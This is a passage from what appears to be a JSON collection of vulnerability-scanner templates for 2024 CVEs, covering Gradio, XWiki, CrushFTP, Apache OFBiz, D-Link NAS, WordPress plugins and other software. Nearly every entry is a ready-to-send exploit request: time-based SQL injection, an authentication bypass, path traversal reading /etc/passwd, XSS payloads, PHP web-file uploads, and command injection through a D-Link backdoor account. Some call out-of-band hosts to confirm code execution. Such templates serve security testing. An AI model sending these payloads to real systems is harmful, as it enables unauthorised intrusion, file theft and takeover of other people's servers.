{{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6420","info":{"name":"Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/hide-my-wp\")","status_code == 200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2024-27718","info":{"name":"Smart s200 Management Platform v.S200 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1561","info":{"name":"Gradio 4.3-4.12 - Local File Read","severity":"high"},"requests":[{"raw":["POST /component_server HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"component_id\": \"1\", \"data\": \"{{path}}\", \"fn_name\": \"move_resource_to_block_cache\", \"session_hash\": \"aaaaaaaaaaa\"}\n","GET /file={{download_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","name":"download_path","internal":true,"group":1,"regex":["\"?([^\"]+)"]}],"payloads":{"path":["c:\\\\windows\\\\win.ini","/etc/passwd"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23692","info":{"name":"Rejetto HTTP File Server - Template injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?n=%0A&cmd=nslookup+{{interactsh-url}}&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["rejetto"]}]}]},{"id":"CVE-2024-8883","info":{"name":"Keycloak - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /realms/master/protocol/openid-connect/auth?client_id={{client_id}}&redirect_uri={{redir_host}}:80@{{redirect_uri}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"redir_host":["http://localhost","http://127.0.0.1","https://localhost","https://127.0.0.1","http://[::]","https://[::]"],"client_id":["security-admin-console","master-realm","broker","admin-cli","account","account-console"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["Location:\\s+https?://(localhost|127.0.0.1|\\[::\\]):\\d*@oast\\.me\\?"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-21650","info":{"name":"XWiki < 4.10.20 - Remote code execution","severity":"critical"},"requests":[{"raw":["GET {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fbin%252Fregister%252FXWiki%252FXWikiRegister%253Fxredirect%253D%25252Fxwiki%25252Fbin%25252Fview%25252FScheduler%25252F%25253Fdo%25253Dtrigger%252526which%25253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\n","POST {{path}}/bin/register/XWiki/XWikiRegister?xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nparent=xwiki%3AMain.UserDirectory&register_first_name={{firstname}}&register_last_name={{lastname}}&xwikiname={{user}}&register_password={{pass}}&register2_password={{pass}}&register_email=\"{{randstr}}%40{{rand_base(5)}}.com&xredirect=%2Fbin%2Fregister%2FXWiki%2FXWikiRegister%3Fxredirect%3D%252Fxwiki%252Fbin%252Fview%252FScheduler%252F%253Fdo%253Dtrigger%2526which%253DScheduler.NotificationEmailDailySender&form_token={{token}}\n"],"payloads":{"path":[null,"/xwiki"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Registration successful","Attack succeeded","Failed to execute the [groovy]"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["data\\-xwiki\\-form\\-token=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2024-29272","info":{"name":"VvvebJs < 1.7.5 - Arbitrary File Upload","severity":"medium"},"requests":[{"raw":["POST /save.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfile=demo/landing/index.php&html={{md5(num)}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"File saved\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /demo/landing/index.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"{{md5(num)}}\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6396","info":{"name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","severity":"critical"},"requests":[{"raw":["POST /tracking/client_1/get-resource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"resource_type\": \"Repo\",\n\"args\": \"AAAAAAABAAAABw==\"\n}\n","POST /tracking/client_1/read-instruction HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"method_name\": \"_backup_run\",\n\"args\": \"{{base64(args)}}\"\n}\n","@Host: http://{{Host}}:43800\nGET /static-files/{{filename}}.txt HTTP/1.1\nHost: {{Host}}:43800\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"handler\":\"my_resource\"}"]},{"type":"word","part":"body_3","words":["{{filename}}.txt"]},{"type":"word","part":"header_3","words":["text/plain"]}]}]},{"id":"CVE-2024-3753","info":{"name":"Hostel < 1.1.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/hostel"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wphostel_bookings&do=edit&id=&type=upcoming&offset=\"><script>alert(document.domain)<%2Fscript>&type=\"><script>alert(document.domain)<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45622","info":{"name":"ASIS - SQL Injection Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /asispanel/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>ASIS | Aplikasi Sistem Sekolah </title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /asispanel/login/cek HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit=\n"],"matchers":[{"type":"dsl","dsl":["status_code == 303"],"condition":"and","internal":true}]},{"raw":["GET /asispanel/home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"Logout\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-1512","info":{"name":"MasterStudy LMS WordPress Plugin <= 3.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%286%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains_all(body,\"items\",\"total\",\"total_price\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-9617","info":{"name":"Danswer - Insecure Direct Object Reference","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"chat_session_id\", \"description\", \"persona_id\")","contains(content_type, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4940","info":{"name":"Gradio - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /file=http://oast.pro/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-4295","info":{"name":"Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"You have been successfully subscribed\")"],"condition":"and"}]}]},{"id":"CVE-2024-27954","info":{"name":"WordPress Automatic Plugin <3.92.1 - Arbitrary File Download and SSRF","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?p=3232&wp_automatic=download&link=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"link\":\"file:"]},{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2024-34061","info":{"name":"Changedetection.io <=v0.45.21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /settings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","is not a valid AppRise URL"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"csrf_token","group":1,"regex":["name=\"csrf_token\" value=\"([^\"]+)\""],"internal":true}]}]},{"id":"CVE-2024-3097","info":{"name":"NextGEN Gallery <= 3.59 - Missing Authorization to Unauthenticated Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ngg/v1/admin/block/image/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":","\"image\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-50340","info":{"name":"Symfony Profiler - Remote Access via Injected Arguments","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains(tolower(body), \"symfony\")"],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/_profiler/phpinfo?+--env=dev"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2024-4040","info":{"name":"CrushFTP VFS - Sandbox Escape LFR","severity":"critical"},"requests":[{"id":"unauth-exploit","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["<response>success</response>"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-7188","info":{"name":"Bylancer Quicklancer 2.4 G - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout 30s\nGET /listing?cat=6&filter=1&job-type=1&keywords=Mr.&location=1&order=desc&placeid=US&placetype=country&range1=1&range2=1)%20AND%20(SELECT%201864%20FROM%20(SELECT(SLEEP(6)))gOGh)%20AND%20(6900=6900&salary-type=1&sort=id&subcat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type,\"text/html\")","contains_all(body,\"og:site_name\",\"og:locale\",\"range2\")"],"condition":"and"}]}]},{"id":"CVE-2024-23167","info":{"name":"GestSup - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /ajax/calendar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=add_event&title=<img/src/onerror=alert(document.domain)>&start={{formatted_date}} 07:30:00&end={{formatted_date}} 23:00:00&allday=false&technician=1\n"],"matchers":[{"type":"word","part":"response","words":["{\"event_id\":\"","text/html"],"condition":"and","internal":true}]},{"raw":["POST /index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&pass={{password}}&submit=submit\n","GET /index.php?page=calendar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view=activity","?page=calendar","<img/src/onerror=alert(document.domain)>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2024-9014","info":{"name":"pgAdmin 4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login?next=/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","negative":true,"regex":["OAUTH2_CLIENT_SECRET\": null"]},{"type":"word","part":"body","words":["<title>pgAdmin 4</title>","OAUTH2_CLIENT_SECRET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3273","info":{"name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["<auth_state>1</auth_state>"]},{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0352","info":{"name":"Likeshop < 2.5.7.20210311 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /api/file/formimage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n\n------WebKitFormBoundarygcflwtei\nContent-Disposition: form-data; name=\"file\";filename=\"{{filename}}.php\"\nContent-Type: application/x-php\n\n{{randstr}}\n------WebKitFormBoundarygcflwtei--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"\\\"name\\\":\\\"{{filename}}.php\\\"\")","contains_all(body, \"code\\\":1\", \"base_url\\\":\\\"uploads\\\\/user\")"],"condition":"and"}],"extractors":[{"type":"json","part":"body","json":[".data.url"]}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-45507","info":{"name":"Apache OFBiz - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/view/StatsSinceStart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstatsDecoratorLocation=http%3a//oast.fun/x%3fb64_body%3d{{urlencode(urlencode(base64(xml)))}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["StatsScreens"]}]}]},{"id":"CVE-2024-40422","info":{"name":"Devika v1 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /api/data HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"models\",\"projects\",\"OPENAI\",\"OLLAMA\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3673","info":{"name":"Web Directory Free < 1.7.3 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/web-directory-free\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfrom_set_ajax=1&action=w2dc_controller_request&template=../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21645","info":{"name":"pyload - Log Injection","severity":"medium"},"requests":[{"raw":["POST /login?next={{RootURL}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{randstr}}\\'%0a[1970-01-01 00:00:00]  INJECTED               {{str}}  THIS ENTRY HAS BEEN INJECTED&password=wrong&submit=Login\n","POST /login?next={{RootURL}}/logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndo=login&username={{username}}&password={{password}}&submit=Login\n"],"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<td>1970-01-01 00:00:00</td><td class=\"loglevel\">INJECTED</td><td class=\"logsource\">{{str}}</td><td>THIS&nbsp;ENTRY&nbsp;HAS&nbsp;BEEN&nbsp;INJECTED&#39;</td>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6926","info":{"name":"Viral Signup <= 2.1 -  SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/viral-signup\")"],"internal":true}]},{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wow_signup_send_free&idsignup=(select*from(select(sleep(6)))a)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6049","info":{"name":"Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}\n"],"host-redirects":true,"matchers":[{"type":"word","part":"body","words":["vTimeSync","Lawo"],"internal":true,"case-insensitive":true}]},{"raw":["GET /.../.../.../.../.../.../.../.../.../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"bit app support\", \"fonts\", \"extensions\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-39903","info":{"name":"Solara <1.35.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /static/nbextensions/#/../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"regex","part":"content_type","regex":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-36683","info":{"name":"PrestaShop productsalert - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_any(tolower(body), \"productsalert\", \"prestashop\")"],"condition":"and","internal":true}]},{"raw":["@timeout: 30s\nPOST /modules/productsalert/pasubmit.php?submitpa&redirect_to=https://{{Hostname}}&type=2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pasubmit=Crea%20un%20nuovo%20messaggio%20di%20notifica&pid=13158\n","@timeout: 30s\nPOST /module/productsalert/AjaxProcess HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncid=0&idl=6&option=2&pa_option=96119&paemail=1' AND (SELECT 2692 FROM (SELECT(SLEEP(5)))IuFA) AND 'pAlk'='pAlk&pid=13158\n"],"stop-at-first-match":true,"host-redirects":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=5","duration_2>=5"]}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<title>Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41955","info":{"name":"Open Redirect in Login Redirect - MobSF","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /login/?next=//interact.sh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"host-redirects":true,"matchers":[{"type":"regex","part":"header_2","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2024-34982","info":{"name":"LyLme-Spage - Arbitary File Upload","severity":"high"},"requests":[{"raw":["POST /include/file.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------575673989461736\n\n-----------------------------575673989461736\nContent-Disposition: form-data; name=\"file\"; filename=\"{{filename}}.php\"\nContent-Type: image/png\n\n<?php echo \"{{string}}\";unlink(__FILE__);?>\n-----------------------------575673989461736--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"code\":","\"msg\":","\"url\":","php\"}"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"path","part":"body","group":1,"regex":["\"url\":\"([/a-z_0-9.]+)\""],"internal":true}]},{"raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"{{string}}\" )","contains(header, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-24131","info":{"name":"SuperWebMailer 9.31.0.01799 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/api.php/<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","SuperWebMailerAPI"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0713","info":{"name":"Monitorr Services Configuration - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaquxwjsn\n\n------WebKitFormBoundaryaquxwjsn\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{file}}.php\"\nContent-Type: 